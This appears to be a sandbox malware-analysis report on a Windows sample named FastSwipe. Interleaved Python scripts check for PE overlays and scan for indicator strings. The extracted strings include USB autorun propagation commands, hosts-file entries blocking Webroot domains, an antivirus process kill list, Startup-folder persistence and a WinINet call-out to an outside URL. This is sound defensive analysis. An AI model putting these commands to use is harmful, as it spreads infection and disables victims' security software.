                                                      • String ID: 1.1.1.1 access-tst.webroot.com$1.1.1.1 access.webroot.com$1.1.1.1 android.webroot.com$1.1.1.1 autodiscover.webroot.com$1.1.1.1 bb.webroot.com$1.1.1.1 bounce.webroot.com$1.1.1.1 bounce2.webroot.com$1.1.1.1 brightcloud.webroot.com$1.1.1.1 carbonite.webroot.com$1.1.1.1 channeledge.webroot.com$1.1.1.1 childsafe.webroot.com$1.1.1.1 cms.webroot.com$1.1.1.1 codingchallenge.webroot.com$1.1.1.1 computer-security.webroot.com$1.1.1.1 connect.webroot.com$1.1.1.1 connectuk.webroot.com$1.1.1.1 contentr.webroot.com$1.1.1.1 crawler.webroot.com$1.1.1.1 cwademo.webroot.com$1.1.1.1 de.webroot.com$1.1.1.1 dnsptest.webroot.com$1.1.1.1 e.webroot.com$1.1.1.1 email.webroot.com$1.1.1.1 encrypt.webroot.com$1.1.1.1 enterpriseenrollment.webroot.com$1.1.1.1 entupdates-cdn.webroot.com$1.1.1.1 es.webroot.com$1.1.1.1 exchangeum.webroot.com$1.1.1.1 extranet.webroot.com$1.1.1.1 fr.webroot.com$1.1.1.1 fs.webroot.com$1.1.1.1 ftp.webroot.com$1.1.1.1 intl.webroot.com$1.1.1.1 it.webroot.com$1.1.1.1 itpro.webroot.com$1.1.1.1 labs.webroot.com$1.1.1.1 lp-carbonite-sandbox.webroot.com$1.1.1.1 lp-carbonite.webroot.com$1.1.1.1 lp.webroot.com$1.1.1.1 lyncdiscover.webroot.com$1.1.1.1 m.webroot.com$1.1.1.1 mail.webroot.com$1.1.1.1 mailbox.webroot.com$1.1.1.1 manageprotect.webroot.com$1.1.1.1 media.webroot.com$1.1.1.1 mirage.webroot.com$1.1.1.1 mobiletest.webroot.com$1.1.1.1 mx.webroot.com$1.1.1.1 mydata.webroot.com$1.1.1.1 myemailer.webroot.com$1.1.1.1 myproduct.webroot.com$1.1.1.1 ncmec.webroot.com$1.1.1.1 nl.webroot.com$1.1.1.1 ns3.webroot.com$1.1.1.1 origin-stage.webroot.com$1.1.1.1 origin.webroot.com$1.1.1.1 outbound.webroot.com$1.1.1.1 outbound1.webroot.com$1.1.1.1 outbound2.webroot.com$1.1.1.1 outbound3.webroot.com$1.1.1.1 outbound4.webroot.com$1.1.1.1 outbound5.webroot.com$1.1.1.1 outbound6.webroot.com$1.1.1.1 outbound7.webroot.com$1.1.1.1 outlook.webroot.com$1.1.1.1 owauk.webroot.com$1.1.1.1 partner.webroot.com$1.1.1.1 provisioning.webroot.com$1.1.1.1 provisioningdev.webroot.com$1.1.1.1 provisioningdev1.webroot.com$1.1.1.1 provisioningdev2.webroot.com$1.1.1.1 provisioningdev4.webroot.com$1.1.1.1 provisioningtest1.webroot.com$1.1.1.1 provisioningtest2.webroot.com$1.1.1.1 provisioningtest3.webroot.com$1.1.1.1 provisioningtest4.webroot.com$1.1.1.1 provisioningtest5.webroot.com$1.1.1.1 research.webroot.com$1.1.1.1 reseller.webroot.com$1.1.1.1 sfdcstage.webroot.com$1.1.1.1 sfdctest6.webroot.com$1.1.1.1 sftp.webroot.com$1.1.1.1 sip.webroot.com$1.1.1.1 smtp-ca.webroot.com$1.1.1.1 smtp-co.webroot.com$1.1.1.1 spyware.webroot.com$1.1.1.1 sso-tst.webroot.com$1.1.1.1 stage.webroot.com$1.1.1.1 support-au.webroot.com$1.1.1.1 support-de.webroot.com$1.1.1.1 support-enterprise.webroot.com$1.1.1.1 support-es.webroot.com$1.1.1.1 support-fr.webroot.com$1.1.1.1 support-it.webroot.com$1.1.1.1 support-nl.webroot.com$1.1.1.1 technet.webroot.com$1.1.1.1 testvpn.webroot.com$1.1.1.1 tunnelfe.webroot.com$1.1.1.1 uk.webroot.com$1.1.1.1 usmail.webroot.com$1.1.1.1 vdi.webroot.com$1.1.1.1 view.webroot.com$1.1.1.1 vpn.webroot.com$1.1.1.1 vpnuk.webroot.com$1.1.1.1 webmail.webroot.com$1.1.1.1 websrv-stg.webroot.com$1.1.1.1 workspace.webroot.com$1.1.1.1 ws-stg.webroot.com$1.1.1.1 ws.webroot.com$1.1.1.1 www2.webroot.com$ABService.exe$BuildService.exe$C:\Users\$C:\Windows\System32\drivers\etc\hosts$CoordService.exe$CptHost.exe$Executable path: $Failed to retrieve username from environment variables.$GameBarFTServer.exe$GoogleCrashHandler.exe$GoogleUpdate.exe$MBAMService.exe$MSBuild.exe$MbamBgNativeMsg.exe$Microsoft.ServiceHub.Controller.exe$MsMpEng.exe$No6po noxanobatb b FastSwipe!$PerfWatson2.exe$ServiceHub.DataWarehouseHost.exe$ServiceHub.IdentityHost.exe$ServiceHub.IntellicodeModelService.exe$ServiceHub.SettingsHost.exe$ServiceHub.TestWindowStoreHost.exe$ServiceHub.ThreadedWaitDialog.exe$StandardCollector.Service.exe$Started blocking antiviruses...$Startup path: $USERNAME$USERPROFILE$Unable to retrieve executable path.$Unable to retrieve user profile directory.$WUDFHost.exe$WebViewHost.exe$Welcome to FastSwipe!$\AppData\Local\Temp\bin.exe$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup$aips.exe$aomhost64.exe$copilot-agent-win.exe$copy /v /y "%s" "%s%s"$copy /v /y "%s" D:\bin.exe$copy /v /y "%s" E:\bin.exe$dllhost.exe$echo [autorun] > D:\autorun.inf$echo [autorun] > E:\autorun.inf$echo open=bin.exe >> D:\autorun.inf$echo open=bin.exe >> E:\autorun.inf$httpd.exe$jucheck.exe$jusched.exe$liveUpdate.exe$msedgewebview2.exe$msvsmon.exe$vcpkgsrv.exe$vctip.exe$vshost.exe$xgTrayIcon.exe$zTscoder.exe$zWebview2Agent.exe$~
                                                      • API String ID: 3633377158-3337010234
                                                      • Opcode ID: cbf807b43b5a869573ca4a1fe14814e7177d24a10e0c93a49c4b98bae0bf198f
                                                      • Instruction ID: 48dcdbf6e657fa4eb215286b4228b903bc1785efd0f260ac11f6e015e76f3b7e
                                                      • Opcode Fuzzy Hash: cbf807b43b5a869573ca4a1fe14814e7177d24a10e0c93a49c4b98bae0bf198f
                                                      • Instruction Fuzzy Hash: 5B838A30E293589EDB29E764CD99B9DBA21DF56300F1081D8E44D272D3DBB83B94CE52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph: function 00201F90-0020217D (CreateToolhelp32Snapshot, Process32FirstW, Process32NextW loop, CloseHandle); rendered graph not reproduced.
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00202015
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00208750), ref: 0020203F
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0020205C
                                                      • CloseHandle.KERNEL32(00000000), ref: 00202067
                                                      Strings
                                                      • Failed to retrieve first process., xrefs: 0020206D
                                                      • Failed to create process snapshot., xrefs: 00202028
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: V01@$??6?$basic_ostream@CloseCreateD@std@@@std@@FirstHandleProcess32SnapshotToolhelp32U?$char_traits@V01@@
                                                      • String ID: Failed to create process snapshot.$Failed to retrieve first process.
                                                      • API String ID: 592929778-2700033378
                                                      • Opcode ID: cad4eb1c37a330b4ee8f937443e9606736dd91407b51e55d47fe5a2c10824fa4
                                                      • Instruction ID: afd289dd1bedaf010c3aa5714763e429eb582859aad4f8f594ef5dc7e120e428
                                                      • Opcode Fuzzy Hash: cad4eb1c37a330b4ee8f937443e9606736dd91407b51e55d47fe5a2c10824fa4
                                                      • Instruction Fuzzy Hash: 8251B1B1A20315DBCB249F24DC8CBAAB7B6FB44300F20429AE509976D2D774AD98CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph: function 00202240-002026A7 (memset, std::basic_istream/basic_streambuf construction, sgetc/sbumpc read loop, basic_ostream::write); rendered graph not reproduced.
                                                      APIs
                                                      • memset.VCRUNTIME140(?,00000000,000000B8,3BC7ADCC), ref: 00202291
                                                      • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 002022B0
                                                      • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000), ref: 002022D5
                                                      • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 0020230F
                                                      • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 00202333
                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,00000021,00000000), ref: 0020238D
                                                      • ??7ios_base@std@@QBE_NXZ.MSVCP140(?,00000021,00000000), ref: 002023D0
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00000000), ref: 00202408
                                                      • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,00000021,00000000), ref: 0020248C
                                                      • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,00000021,00000000), ref: 002024AF
                                                      • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,00000021,00000000), ref: 002024F2
                                                      • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,?,?,00000021,00000000), ref: 00202534
                                                      • memset.VCRUNTIME140(?,00000000,000000B0,?,?,?,?,00000021,00000000), ref: 0020256D
                                                      • ??7ios_base@std@@QBE_NXZ.MSVCP140(?,?,00000000,000000B0,?,?,?,?,00000021,00000000), ref: 00202597
                                                      • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(?,?,00000000,?,00000021,00000000), ref: 002025E1
                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,00000021,00000000), ref: 00202608
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00208750,?,00000021,00000000), ref: 00202625
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000021,00000000), ref: 0020265C
                                                      Strings
                                                      • Error: Unable to open file , xrefs: 002023E0
                                                      • P , xrefs: 00202368
                                                      • Error: Unable to open file for writing: , xrefs: 002025A7
                                                      • Text appended to executable successfully., xrefs: 00202614
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                       • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: U?$char_traits@$D@std@@@std@@$V01@$?sgetc@?$basic_streambuf@$??6?$basic_ostream@??7ios_base@std@@?setstate@?$basic_ios@V01@@memset$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?sbumpc@?$basic_streambuf@?write@?$basic_ostream@D@std@@@1@_Init@?$basic_streambuf@V12@V?$basic_streambuf@_invalid_parameter_noinfo_noreturn
                                                      • String ID: Error: Unable to open file $Error: Unable to open file for writing: $P $Text appended to executable successfully.
                                                      • API String ID: 3162005658-1381544702
                                                      • Opcode ID: 2e8daa763ac0018f7dc2e821ac8948bbd0ee10d81cf54c9e4d9588311104500c
                                                      • Instruction ID: fb8087b616beff69fc6d2b3e3b947fb58520a0c8424142706be5c8e1ab37de52
                                                      • Opcode Fuzzy Hash: 2e8daa763ac0018f7dc2e821ac8948bbd0ee10d81cf54c9e4d9588311104500c
                                                      • Instruction Fuzzy Hash: E9D18B70A10319CFDB14CF64DD99BEEBBB5AF04304F10429AE90AA72D2DB709A59CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%
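The strings in the record above ("Error: Unable to open file", "Error: Unable to open file for writing: ", "Text appended to executable successfully.") belong to a routine that reads one file and writes extra bytes onto an executable. Anything written after the raw data of the last section is never mapped by the loader and sits in the file as a PE overlay, which is the first thing to measure when triaging a sample that modifies executables on disk. The script below is an added example, not code from the report or the sample: it walks the section table to find where the overlay starts, and it runs on a constructed minimal PE image rather than on the analysed file.

```python
"""PE overlay check.

Added example; not code from the Joe Sandbox report or from the analysed
sample. The PE image it runs on is a constructed minimal skeleton, not the
sample itself.
"""
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D     # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550  # "PE\0\0"
FILE_ALIGNMENT = 0x200
SECTION_HEADER_SIZE = 40


def overlay_offset(pe: bytes) -> int:
    """File offset where data past the last section's raw bytes begins.

    Equals len(pe) when there is no overlay. Raises ValueError on a file
    that is not a PE, so callers never treat garbage as "no overlay".
    """
    if len(pe) < 0x40 or struct.unpack_from("<H", pe, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if e_lfanew + 24 > len(pe) or struct.unpack_from("<I", pe, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("bad NT signature")
    # IMAGE_FILE_HEADER fields after Machine: NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader
    num_sections, _, _, _, size_opt = struct.unpack_from("<HIIIH", pe, e_lfanew + 6)
    sect_tbl = e_lfanew + 24 + size_opt
    end = sect_tbl + SECTION_HEADER_SIZE * num_sections  # headers at minimum
    for i in range(num_sections):
        # IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress,
        # SizeOfRawData, PointerToRawData
        _, _, _, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", pe, sect_tbl + SECTION_HEADER_SIZE * i)
        if raw_size:
            end = max(end, raw_ptr + raw_size)
    return min(end, len(pe))  # a truncated file has no overlay


def overlay(pe: bytes) -> bytes:
    """The bytes the loader never maps: everything after the last section."""
    return pe[overlay_offset(pe):]


def build_minimal_pe() -> bytes:
    """Constructed 32-bit PE skeleton: one 0x200-byte .text section at 0x200."""
    dos = bytearray(0x40)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> NT headers at 0x40
    opt_size = 0xE0  # PE32 optional header size
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    opt_hdr = bytearray(opt_size)
    struct.pack_into("<H", opt_hdr, 0, 0x10B)  # PE32 magic
    section = struct.pack("<8sIIIIIIHHI", b".text\0\0\0",
                          0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + struct.pack("<I", IMAGE_NT_SIGNATURE)
               + file_hdr + bytes(opt_hdr) + section).ljust(FILE_ALIGNMENT, b"\0")
    text = b"\xC3".ljust(0x200, b"\xCC")  # ret, then int3 padding
    return headers + text


if __name__ == "__main__":
    clean = build_minimal_pe()
    tampered = clean + b"appended text\n"  # what an append-to-executable routine leaves behind
    for name, img in (("clean", clean), ("tampered", tampered)):
        print(f"{name}: size={len(img):#x} overlay={len(overlay(img))} bytes")
```

On a real file, read it with open(path, "rb").read() and pass the bytes to overlay(); a non-empty result on a binary that should have none, or one that grows between runs, is the on-disk artefact a routine like the one above leaves behind.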

                                                      Control-flow Graph

                                                      APIs
                                                      • InternetOpenW.WININET(MyApp,00000001,00000000,00000000,00000000), ref: 00202195
                                                      • InternetOpenUrlW.WININET(00000000,https://stopify.co/news.php?tid=JBB69H.jpg ,00000000,00000000,80000000,00000000), ref: 002021B2
                                                      • InternetCloseHandle.WININET(00000000), ref: 002021BD
                                                      • InternetCloseHandle.WININET(00000000), ref: 002021C4
                                                      • GetLastError.KERNEL32(00208750), ref: 002021D4
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP140(00000000), ref: 002021ED
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140 ref: 002021F5
                                                      • InternetCloseHandle.WININET(00000000), ref: 002021FC
                                                      • GetLastError.KERNEL32(00208750), ref: 0020220C
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP140(00000000), ref: 00202225
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140 ref: 0020222D
                                                      Strings
                                                      • Failed to initialize WinINet. Error code: , xrefs: 00202218
                                                      • https://stopify.co/news.php?tid=JBB69H.jpg , xrefs: 002021AC
                                                      • Failed to open URL. Error code: , xrefs: 002021E0
                                                      • MyApp, xrefs: 00202190
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                       • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: V01@$Internet$??6?$basic_ostream@D@std@@@std@@U?$char_traits@$CloseHandle$ErrorLastOpenV01@@
                                                      • String ID: Failed to initialize WinINet. Error code: $Failed to open URL. Error code: $MyApp$https://stopify.co/news.php?tid=JBB69H.jpg
                                                      • API String ID: 66322635-1443242255
                                                      • Opcode ID: 53fe1dc41c1cae1a383cba5db74faff0697ffd30d12714cc18abb3794b5632ed
                                                      • Instruction ID: 80dc1e3f26569b8d7120a147c0ec545a8269292918909ddfc8921b9448bd50a6
                                                      • Opcode Fuzzy Hash: 53fe1dc41c1cae1a383cba5db74faff0697ffd30d12714cc18abb3794b5632ed
                                                      • Instruction Fuzzy Hash: 4011A5B1760300E7DB202B74BC4EB9A765ADB45712F308346FD0AE32D3DEA05424C695
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%
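The record above is the sample's network call-out: InternetOpenW with the user agent MyApp and access type 1 (INTERNET_OPEN_TYPE_DIRECT, no proxy), then InternetOpenUrlW on https://stopify.co/news.php?tid=JBB69H.jpg with flags 0x80000000 (INTERNET_FLAG_RELOAD, bypass the cache), each failure path writing a GetLastError code through std::ostream. One practical point for anyone turning these strings into a signature: the report prints every string decoded, but the W-suffixed WinINet calls consume UTF-16LE, so "MyApp" and the URL are wide in the binary while the ostream messages are narrow, and an ASCII-only rule misses exactly the network indicators. The script below is an added example, not code from the report or the sample; it scans a constructed byte blob for the reported strings in the encoding each one is actually stored in and contrasts that with an ASCII-only search.

```python
"""Encoding-aware IOC string scan.

Added example; not code from the Joe Sandbox report or from the analysed
sample. The four strings below are copied from the report's "Strings" lists.
The byte blob it scans is constructed here so the script runs offline.
"""
import re

# Arguments to InternetOpenW / InternetOpenUrlW: W-suffixed APIs take
# UTF-16LE strings, so this is how they sit in the binary.
WIDE_IOCS = [
    "MyApp",
    "https://stopify.co/news.php?tid=JBB69H.jpg",
]
# Messages pushed through std::ostream (char streams): stored as narrow text.
NARROW_IOCS = [
    "Text appended to executable successfully.",
    "Error: Unable to open file for writing: ",
]


def build_patterns():
    """Compile each IOC in the encoding the sample actually stores it in."""
    pats = [(s, "utf-16le", re.compile(re.escape(s.encode("utf-16le"))))
            for s in WIDE_IOCS]
    pats += [(s, "ascii", re.compile(re.escape(s.encode("ascii"))))
             for s in NARROW_IOCS]
    return pats


def scan(blob: bytes):
    """Return sorted (offset, encoding, string) hits for every IOC in blob."""
    hits = []
    for text, enc, pat in build_patterns():
        hits.extend((m.start(), enc, text) for m in pat.finditer(blob))
    return sorted(hits)


def ascii_only_scan(blob: bytes):
    """What a signature that only searches ASCII copies of the IOCs finds."""
    found = []
    for text in WIDE_IOCS + NARROW_IOCS:
        off = blob.find(text.encode("ascii"))
        if off != -1:
            found.append((off, text))
    return sorted(found)


# Constructed stand-in for the sample's read-only data: 16 bytes of padding,
# the two wide literals with their UTF-16 terminators, then the narrow ones.
SAMPLE = (
    b"\x00" * 16
    + "MyApp".encode("utf-16le") + b"\x00\x00"
    + "https://stopify.co/news.php?tid=JBB69H.jpg".encode("utf-16le") + b"\x00\x00"
    + b"Text appended to executable successfully.\x00"
    + b"Error: Unable to open file for writing: \x00"
)

if __name__ == "__main__":
    for off, enc, text in scan(SAMPLE):
        print(f"{off:#06x}  {enc:8s}  {text}")
    print("ascii-only signature would match:",
          [t for _, t in ascii_only_scan(SAMPLE)])
```

The same split applies to any rule written from a sandbox string list: check which API consumes each string and encode the pattern accordingly, or emit both forms.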

                                                      Control-flow Graph

                                                       Control-flow graph (rendered image omitted): basic blocks 00208530-0020874F, coloured executed / not executed.
                                                      APIs
                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(3BC7ADCC,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002085D0
                                                      • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002085EB
                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002085F8
                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(00000000,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 0020864E
                                                      • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,000000FF,00000000,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 00208677
                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002086C1
                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 00208708
                                                      • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 0020870E
                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 0020871D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                       • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                                      • String ID:
                                                      • API String ID: 3274656010-0
                                                      • Opcode ID: eb4cf05cb41b542053a6e85d2c8a78b8029f1e63c37b549a814e3b5f2a9410cd
                                                      • Instruction ID: 44027a2a665117a8d6f02d0b565943fe74e86dccbd940e4311113bbc208fc42d
                                                      • Opcode Fuzzy Hash: eb4cf05cb41b542053a6e85d2c8a78b8029f1e63c37b549a814e3b5f2a9410cd
                                                      • Instruction Fuzzy Hash: F8717F75A10601CFCB14CF58D994B6ABBB1BF49314F2A8299D856AB3E3CB329C55CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                       Control-flow graph (rendered image omitted): basic blocks 00208D10-00208EF7, coloured executed / not executed.
                                                      APIs
                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(3BC7ADCC,?,?), ref: 00208D88
                                                      • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(?,?), ref: 00208DA3
                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,?), ref: 00208DB0
                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,?,?), ref: 00208E07
                                                      • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,?,00000000,?,?), ref: 00208E30
                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,?,?), ref: 00208E57
                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,?), ref: 00208EB0
                                                      • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?), ref: 00208EB6
                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,?), ref: 00208EC5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                       • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                                      • String ID:
                                                      • API String ID: 3274656010-0
                                                      • Opcode ID: eac4c0eb286012fe33f475bfa561d200e1ae9609c508d39ba83645e36a5e5283
                                                      • Instruction ID: 5f868cc89252dd58a10df2d02c5d6831228d0492ef754fb7486d1552421f43bd
                                                      • Opcode Fuzzy Hash: eac4c0eb286012fe33f475bfa561d200e1ae9609c508d39ba83645e36a5e5283
                                                      • Instruction Fuzzy Hash: AF515E74615605DFCB14CF68D588BA9BBB1FF08314F248269E9569B7E2CB31DD21CB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000021,?,00000040,3BC7ADCC,?,?,?,00202377,?,00000021,00000000), ref: 00208430
                                                      • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140(?,?,?,?,00202377,?,00000021,00000000), ref: 0020844D
                                                      • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,?,?), ref: 00208475
                                                      • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,00202377,?,00000021,00000000), ref: 002084BA
                                                        • Part of subcall function 00208780: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,3BC7ADCC,00000000,P ,?,0020BB56,000000FF,?,002084CE), ref: 002087B5
                                                        • Part of subcall function 00208780: ??Bid@locale@std@@QAEIXZ.MSVCP140(?,0020BB56,000000FF), ref: 002087D0
                                                        • Part of subcall function 00208780: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,0020BB56,000000FF), ref: 002087FB
